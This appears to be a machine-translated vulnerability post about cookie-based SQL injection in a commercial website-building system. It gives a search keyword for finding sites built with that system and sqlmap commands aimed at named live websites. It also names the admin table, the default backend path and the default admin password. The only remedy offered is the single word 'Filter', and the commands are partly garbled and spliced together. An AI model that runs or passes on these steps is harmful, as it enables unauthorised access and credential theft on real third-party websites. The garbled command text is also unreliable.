Cookie transit injection in a general website construction system
Google Keyword: technical support: le Yi Technology (a bit more)
The website construction system of a company named Happy arts technology is filtered, but the general anti-injection is used, and cookie transfer injection can be used.
At first glance, it seems like general anti-Injection
It has been verified that the websites built by this company are basically all universal anti-injection, so they can all be converted into cookie injection. All the parameters are OK, so we can randomly pick the parameter for verification.
Proof:
1. sqlmap. py-u "http://www.szzel.com/product.asp" -- cookie "sqlmap. py-u" http://www.yunyvision.com/case.asp "-- cookie" ncid = 19 "-- level 2-Tncid = 19" -- level 2
The Administrator table name is sd_admin.
2.
Sqlmap. py-u "http://www.yunyvision.com/case.asp" -- cookie "ncid = 19" -- level 2
After reading this, the tables are basically the same. If there is an administrator password in it, you won't be able to run them all to prove that they are common.
Default backend: lesiure/index. asp decryption administrator password admin
Log on to the background:
Solution:
Filter